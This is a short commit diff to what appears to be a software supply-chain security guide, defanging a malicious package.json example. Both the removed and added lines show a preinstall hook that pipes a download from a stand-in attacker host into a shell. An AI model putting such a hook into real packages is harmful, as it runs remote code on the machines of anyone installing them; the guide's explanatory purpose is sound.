Fix: Defang malware example to prevent AV quarantine

This commit is contained in:
Shanujan Suresh
2026-06-18 14:43:19 +05:30
committed by GitHub
parent 04450304b1
commit 1aa3664910
@@ -77,7 +77,7 @@ cosign verify-blob --signature file.sig --certificate file.crt artifact.tar.gz
```json
{
"scripts": {
"preinstall": "curl evil.com/payload | sh",
"preinstall": "curl evil[.]example/payload | sh",
"postinstall": "node ./install.js",
"preuninstall": "node cleanup.js"
}